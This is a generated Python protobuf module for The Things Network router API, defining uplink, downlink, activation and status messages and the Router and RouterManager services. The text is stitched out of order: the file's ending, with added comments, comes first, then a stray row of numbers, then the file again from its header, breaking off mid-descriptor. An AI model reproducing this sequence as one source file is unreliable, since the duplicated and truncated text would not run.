_sym_db.RegisterMessage(Status)
# Drop the parsed descriptor/field options now that their serialized form has
# been recorded (standard protoc boilerplate; options live in serialized_options).
DESCRIPTOR._options = None
_UPLINKMESSAGE.fields_by_name['protocol_metadata']._options = None
_UPLINKMESSAGE.fields_by_name['gateway_metadata']._options = None
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration']._options = None
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['dev_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['app_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata']._options = None
_GATEWAYSTATUSREQUEST.fields_by_name['gateway_id']._options = None
_GATEWAYSTATUSRESPONSE.fields_by_name['status']._options = None
# router.Router service: gateway-facing RPCs — client-streaming GatewayStatus
# and Uplink (both returning google.protobuf.Empty), server-streaming
# Subscribe (downlinks), and unary Activate.
_ROUTER = _descriptor.ServiceDescriptor(
  name='Router',
  full_name='router.Router',
  file=DESCRIPTOR,
  index=0,
  serialized_options=None,
  serialized_start=1707,
  serialized_end=1979,
  methods=[
  _descriptor.MethodDescriptor(
    name='GatewayStatus',
    full_name='router.Router.GatewayStatus',
    index=0,
    containing_service=None,
    input_type=github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS,
    output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
    serialized_options=None,
  ),
  _descriptor.MethodDescriptor(
    name='Uplink',
    full_name='router.Router.Uplink',
    index=1,
    containing_service=None,
    input_type=_UPLINKMESSAGE,
    output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
    serialized_options=None,
  ),
  _descriptor.MethodDescriptor(
    name='Subscribe',
    full_name='router.Router.Subscribe',
    index=2,
    containing_service=None,
    input_type=_SUBSCRIBEREQUEST,
    output_type=_DOWNLINKMESSAGE,
    serialized_options=None,
  ),
  _descriptor.MethodDescriptor(
    name='Activate',
    full_name='router.Router.Activate',
    index=3,
    containing_service=None,
    input_type=_DEVICEACTIVATIONREQUEST,
    output_type=_DEVICEACTIVATIONRESPONSE,
    serialized_options=None,
  ),
])
_sym_db.RegisterServiceDescriptor(_ROUTER)
DESCRIPTOR.services_by_name['Router'] = _ROUTER
# router.RouterManager service: management RPCs — unary GatewayStatus lookup
# and unary GetStatus returning the router.Status metrics snapshot.
_ROUTERMANAGER = _descriptor.ServiceDescriptor(
  name='RouterManager',
  full_name='router.RouterManager',
  file=DESCRIPTOR,
  index=1,
  serialized_options=None,
  serialized_start=1982,
  serialized_end=2127,
  methods=[
  _descriptor.MethodDescriptor(
    name='GatewayStatus',
    full_name='router.RouterManager.GatewayStatus',
    index=0,
    containing_service=None,
    input_type=_GATEWAYSTATUSREQUEST,
    output_type=_GATEWAYSTATUSRESPONSE,
    serialized_options=None,
  ),
  _descriptor.MethodDescriptor(
    name='GetStatus',
    full_name='router.RouterManager.GetStatus',
    index=1,
    containing_service=None,
    input_type=_STATUSREQUEST,
    output_type=_STATUS,
    serialized_options=None,
  ),
])
_sym_db.RegisterServiceDescriptor(_ROUTERMANAGER)
DESCRIPTOR.services_by_name['RouterManager'] = _ROUTERMANAGER
# @@protoc_insertion_point(module_scope)
| 45.917574 | 3,507 | 0.781981 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/TheThingsNetwork/api/router/router.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from github_com.TheThingsNetwork.api import api_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2
from github_com.TheThingsNetwork.api.protocol import protocol_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2
from github_com.TheThingsNetwork.api.gateway import gateway_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2
from github_com.TheThingsNetwork.api.trace import trace_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/TheThingsNetwork/api/router/router.proto',
package='router',
syntax='proto3',
serialized_options=b'\n\037org.thethingsnetwork.api.routerB\013RouterProtoP\001Z&github.com/TheThingsNetwork/api/router\252\002\033TheThingsNetwork.API.Router',
serialized_pb=b'\n3github.com/TheThingsNetwork/api/router/router.proto\x12\x06router\x1a\x1bgoogle/protobuf/empty.proto\x1a-github.com/gogo/protobuf/gogoproto/gogo.proto\x1a)github.com/TheThingsNetwork/api/api.proto\x1a\x37github.com/TheThingsNetwork/api/protocol/protocol.proto\x1a\x35github.com/TheThingsNetwork/api/gateway/gateway.proto\x1a\x31github.com/TheThingsNetwork/api/trace/trace.proto\"\x12\n\x10SubscribeRequest\"\xcd\x01\n\rUplinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12\x35\n\x11protocol_metadata\x18\x0b \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x0c \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xe3\x01\n\x0f\x44ownlinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12?\n\x16protocol_configuration\x18\x0b \x01(\x0b\x32\x19.protocol.TxConfigurationB\x04\xc8\xde\x1f\x00\x12=\n\x15gateway_configuration\x18\x0c \x01(\x0b\x32\x18.gateway.TxConfigurationB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xbe\x03\n\x17\x44\x65viceActivationRequest\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12T\n\x07\x64\x65v_eui\x18\x0b \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x44\x65vEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.DevEUI\x12T\n\x07\x61pp_eui\x18\x0c \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x41ppEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.AppEUI\x12\x35\n\x11protocol_metadata\x18\x15 \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x16 \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x39\n\x13\x61\x63tivation_metadata\x18\x17 \x01(\x0b\x32\x1c.protocol.ActivationMetadata\x12\x1b\n\x05trace\x18\x1f 
\x01(\x0b\x32\x0c.trace.Trace\"\x1a\n\x18\x44\x65viceActivationResponse\"9\n\x14GatewayStatusRequest\x12!\n\ngateway_id\x18\x01 \x01(\tB\r\xe2\xde\x1f\tGatewayID\"Q\n\x15GatewayStatusResponse\x12\x11\n\tlast_seen\x18\x01 \x01(\x03\x12%\n\x06status\x18\x02 \x01(\x0b\x32\x0f.gateway.StatusB\x04\xc8\xde\x1f\x00\"\x0f\n\rStatusRequest\"\x88\x02\n\x06Status\x12 \n\x06system\x18\x01 \x01(\x0b\x32\x10.api.SystemStats\x12&\n\tcomponent\x18\x02 \x01(\x0b\x32\x13.api.ComponentStats\x12\"\n\x0egateway_status\x18\x0b \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x06uplink\x18\x0c \x01(\x0b\x32\n.api.Rates\x12\x1c\n\x08\x64ownlink\x18\r \x01(\x0b\x32\n.api.Rates\x12\x1f\n\x0b\x61\x63tivations\x18\x0e \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x12\x63onnected_gateways\x18\x15 \x01(\r\x12\x19\n\x11\x63onnected_brokers\x18\x16 \x01(\r2\x90\x02\n\x06Router\x12:\n\rGatewayStatus\x12\x0f.gateway.Status\x1a\x16.google.protobuf.Empty(\x01\x12\x39\n\x06Uplink\x12\x15.router.UplinkMessage\x1a\x16.google.protobuf.Empty(\x01\x12@\n\tSubscribe\x12\x18.router.SubscribeRequest\x1a\x17.router.DownlinkMessage0\x01\x12M\n\x08\x41\x63tivate\x12\x1f.router.DeviceActivationRequest\x1a .router.DeviceActivationResponse2\x91\x01\n\rRouterManager\x12L\n\rGatewayStatus\x12\x1c.router.GatewayStatusRequest\x1a\x1d.router.GatewayStatusResponse\x12\x32\n\tGetStatus\x12\x15.router.StatusRequest\x1a\x0e.router.StatusBv\n\x1forg.thethingsnetwork.api.routerB\x0bRouterProtoP\x01Z&github.com/TheThingsNetwork/api/router\xaa\x02\x1bTheThingsNetwork.API.Routerb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2.DESCRIPTOR,])
_SUBSCRIBEREQUEST = _descriptor.Descriptor(
name='SubscribeRequest',
full_name='router.SubscribeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=345,
serialized_end=363,
)
_UPLINKMESSAGE = _descriptor.Descriptor(
name='UplinkMessage',
full_name='router.UplinkMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.UplinkMessage.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.UplinkMessage.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_metadata', full_name='router.UplinkMessage.protocol_metadata', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_metadata', full_name='router.UplinkMessage.gateway_metadata', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.UplinkMessage.trace', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=366,
serialized_end=571,
)
_DOWNLINKMESSAGE = _descriptor.Descriptor(
name='DownlinkMessage',
full_name='router.DownlinkMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.DownlinkMessage.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.DownlinkMessage.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_configuration', full_name='router.DownlinkMessage.protocol_configuration', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_configuration', full_name='router.DownlinkMessage.gateway_configuration', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.DownlinkMessage.trace', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=574,
serialized_end=801,
)
_DEVICEACTIVATIONREQUEST = _descriptor.Descriptor(
name='DeviceActivationRequest',
full_name='router.DeviceActivationRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.DeviceActivationRequest.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.DeviceActivationRequest.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dev_eui', full_name='router.DeviceActivationRequest.dev_eui', index=2,
number=11, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\006DevEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.DevEUI', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='app_eui', full_name='router.DeviceActivationRequest.app_eui', index=3,
number=12, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\006AppEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.AppEUI', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_metadata', full_name='router.DeviceActivationRequest.protocol_metadata', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_metadata', full_name='router.DeviceActivationRequest.gateway_metadata', index=5,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_metadata', full_name='router.DeviceActivationRequest.activation_metadata', index=6,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.DeviceActivationRequest.trace', index=7,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=804,
serialized_end=1250,
)
_DEVICEACTIVATIONRESPONSE = _descriptor.Descriptor(
name='DeviceActivationResponse',
full_name='router.DeviceActivationResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1252,
serialized_end=1278,
)
_GATEWAYSTATUSREQUEST = _descriptor.Descriptor(
name='GatewayStatusRequest',
full_name='router.GatewayStatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='gateway_id', full_name='router.GatewayStatusRequest.gateway_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\tGatewayID', file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1280,
serialized_end=1337,
)
_GATEWAYSTATUSRESPONSE = _descriptor.Descriptor(
name='GatewayStatusResponse',
full_name='router.GatewayStatusResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='last_seen', full_name='router.GatewayStatusResponse.last_seen', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='router.GatewayStatusResponse.status', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1339,
serialized_end=1420,
)
_STATUSREQUEST = _descriptor.Descriptor(
name='StatusRequest',
full_name='router.StatusRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1422,
serialized_end=1437,
)
_STATUS = _descriptor.Descriptor(
name='Status',
full_name='router.Status',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='system', full_name='router.Status.system', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='component', full_name='router.Status.component', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_status', full_name='router.Status.gateway_status', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='uplink', full_name='router.Status.uplink', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='downlink', full_name='router.Status.downlink', index=4,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activations', full_name='router.Status.activations', index=5,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='connected_gateways', full_name='router.Status.connected_gateways', index=6,
number=21, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='connected_brokers', full_name='router.Status.connected_brokers', index=7,
number=22, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1440,
serialized_end=1704,
)
_UPLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_UPLINKMESSAGE.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DOWNLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DEVICEACTIVATIONREQUEST.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['activation_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._ACTIVATIONMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_GATEWAYSTATUSRESPONSE.fields_by_name['status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS
_STATUS.fields_by_name['system'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._SYSTEMSTATS
_STATUS.fields_by_name['component'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._COMPONENTSTATS
_STATUS.fields_by_name['gateway_status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['uplink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['downlink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['activations'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
DESCRIPTOR.message_types_by_name['SubscribeRequest'] = _SUBSCRIBEREQUEST
DESCRIPTOR.message_types_by_name['UplinkMessage'] = _UPLINKMESSAGE
DESCRIPTOR.message_types_by_name['DownlinkMessage'] = _DOWNLINKMESSAGE
DESCRIPTOR.message_types_by_name['DeviceActivationRequest'] = _DEVICEACTIVATIONREQUEST
DESCRIPTOR.message_types_by_name['DeviceActivationResponse'] = _DEVICEACTIVATIONRESPONSE
DESCRIPTOR.message_types_by_name['GatewayStatusRequest'] = _GATEWAYSTATUSREQUEST
DESCRIPTOR.message_types_by_name['GatewayStatusResponse'] = _GATEWAYSTATUSRESPONSE
DESCRIPTOR.message_types_by_name['StatusRequest'] = _STATUSREQUEST
DESCRIPTOR.message_types_by_name['Status'] = _STATUS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SubscribeRequest = _reflection.GeneratedProtocolMessageType('SubscribeRequest', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBEREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.SubscribeRequest)
})
_sym_db.RegisterMessage(SubscribeRequest)
UplinkMessage = _reflection.GeneratedProtocolMessageType('UplinkMessage', (_message.Message,), {
'DESCRIPTOR' : _UPLINKMESSAGE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.UplinkMessage)
})
_sym_db.RegisterMessage(UplinkMessage)
DownlinkMessage = _reflection.GeneratedProtocolMessageType('DownlinkMessage', (_message.Message,), {
'DESCRIPTOR' : _DOWNLINKMESSAGE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DownlinkMessage)
})
_sym_db.RegisterMessage(DownlinkMessage)
DeviceActivationRequest = _reflection.GeneratedProtocolMessageType('DeviceActivationRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEACTIVATIONREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DeviceActivationRequest)
})
_sym_db.RegisterMessage(DeviceActivationRequest)
DeviceActivationResponse = _reflection.GeneratedProtocolMessageType('DeviceActivationResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICEACTIVATIONRESPONSE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.DeviceActivationResponse)
})
_sym_db.RegisterMessage(DeviceActivationResponse)
GatewayStatusRequest = _reflection.GeneratedProtocolMessageType('GatewayStatusRequest', (_message.Message,), {
'DESCRIPTOR' : _GATEWAYSTATUSREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.GatewayStatusRequest)
})
_sym_db.RegisterMessage(GatewayStatusRequest)
GatewayStatusResponse = _reflection.GeneratedProtocolMessageType('GatewayStatusResponse', (_message.Message,), {
'DESCRIPTOR' : _GATEWAYSTATUSRESPONSE,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.GatewayStatusResponse)
})
_sym_db.RegisterMessage(GatewayStatusResponse)
StatusRequest = _reflection.GeneratedProtocolMessageType('StatusRequest', (_message.Message,), {
'DESCRIPTOR' : _STATUSREQUEST,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.StatusRequest)
})
_sym_db.RegisterMessage(StatusRequest)
Status = _reflection.GeneratedProtocolMessageType('Status', (_message.Message,), {
'DESCRIPTOR' : _STATUS,
'__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
# @@protoc_insertion_point(class_scope:router.Status)
})
_sym_db.RegisterMessage(Status)
DESCRIPTOR._options = None
_UPLINKMESSAGE.fields_by_name['protocol_metadata']._options = None
_UPLINKMESSAGE.fields_by_name['gateway_metadata']._options = None
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration']._options = None
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['dev_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['app_eui']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata']._options = None
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata']._options = None
_GATEWAYSTATUSREQUEST.fields_by_name['gateway_id']._options = None
_GATEWAYSTATUSRESPONSE.fields_by_name['status']._options = None
_ROUTER = _descriptor.ServiceDescriptor(
name='Router',
full_name='router.Router',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=1707,
serialized_end=1979,
methods=[
_descriptor.MethodDescriptor(
name='GatewayStatus',
full_name='router.Router.GatewayStatus',
index=0,
containing_service=None,
input_type=github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='Uplink',
full_name='router.Router.Uplink',
index=1,
containing_service=None,
input_type=_UPLINKMESSAGE,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
_descriptor.MethodDescriptor(
